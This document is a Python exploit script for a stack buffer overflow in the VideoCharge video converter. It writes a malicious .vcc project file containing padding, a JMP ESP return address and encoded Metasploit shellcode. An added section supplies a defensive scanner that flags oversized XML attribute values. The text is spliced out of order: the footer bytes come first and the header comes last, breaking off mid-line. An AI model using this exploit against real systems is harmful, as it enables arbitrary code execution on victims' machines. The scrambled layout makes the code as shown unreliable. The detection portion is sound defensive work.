"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230      # padding up to the saved return address
# JMP ESP [urlmon.dll]
payload += struct.pack("<L", 0x781c2014)
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
    print "[+]Creating Exploit File...\n"
    file = open("noname1.vcc", "wb")
    file.write(sploit)
    file.close()                      # close() must be called, not merely referenced
    print "[+]File noname1.vcc created successfully.\n"
except Exception as e:
    print "**[-]Error: %s\n" % e
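The generated .vcc file is XML whose IDX attribute carries the oversized value; the first 230 bytes of it reach the saved return address. For triage of project files of this kind, the following added scanner (not the exploit author's code) walks every `value='…'` attribute and flags values that exceed a length bound or consist of a single repeated byte, the classic padding signature. The bound of 128 bytes is an assumption, chosen above any legitimate value and below the 230-byte offset; the sample files are constructed to mirror the layout of the header and footer above.

```python
"""
Triage scanner for XML project files with attribute values, flagging oversized
values and single-byte runs. The length bound is an assumption.
"""
import re

ATTR_RE = re.compile(rb"<(?P<tag>[A-Za-z_]+)\s+value='(?P<value>[^']*)'")


def scan_vcc(data, max_value_len=128):
    """Return a finding for every value='…' attribute that exceeds max_value_len or
    is a run of at least 32 identical bytes."""
    findings = []
    for m in ATTR_RE.finditer(data):
        tag, value = m.group("tag").decode("ascii"), m.group("value")
        if len(value) > max_value_len:
            reason = "value length %d exceeds %d" % (len(value), max_value_len)
        elif len(value) >= 32 and len(set(value)) == 1:
            reason = "run of %d identical bytes" % len(value)
        else:
            continue
        findings.append({"tag": tag, "length": len(value),
                         "offset": m.start("value"), "reason": reason})
    return findings


# Constructed samples modelled on the project-file layout in the exploit's header/footer.
BENIGN_VCC = (b"<?xml version=\"1.0\" encoding=\"Windows-1251\" ?><Main>\r\n"
              b"<PathToMediaFile value='C:\\videos\\sample.mp4' type='8'>\r\n"
              b"<IDX value='0' type='8'>\r\n</IDX>\r\n</PathToMediaFile>\r\n</Main>\r\n")
SUSPECT_VCC = BENIGN_VCC.replace(b"<IDX value='0'", b"<IDX value='" + b"A" * 1000 + b"'")


if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    if not paths:
        for label, blob in (("benign", BENIGN_VCC), ("suspect", SUSPECT_VCC)):
            print(label, scan_vcc(blob))
    for path in paths:
        with open(path, "rb") as fh:
            for f in scan_vcc(fh.read()):
                print("%s: <%s> at offset %d: %s" % (path, f["tag"], f["offset"], f["reason"]))
```

Run without arguments it scans the two embedded samples; with file paths it scans those files. The regex deliberately does not parse the XML, so a file that is malformed on purpose is still scanned.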
#!/usr/bin/python
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.18.4.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.18.4.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Full.shtml
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & < 3000 A's will also crash the program, but you'd have to
# use the SEH route, which makes for a good exercise since the program only accepts
# ASCII-printable characters and 5c (retn) is a bad character (no push [reg]+ret, jmp [reg] or call [reg])
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
